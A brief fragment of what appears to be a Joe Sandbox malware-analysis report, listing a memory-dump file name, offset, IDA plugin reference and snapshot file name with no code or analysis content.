                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity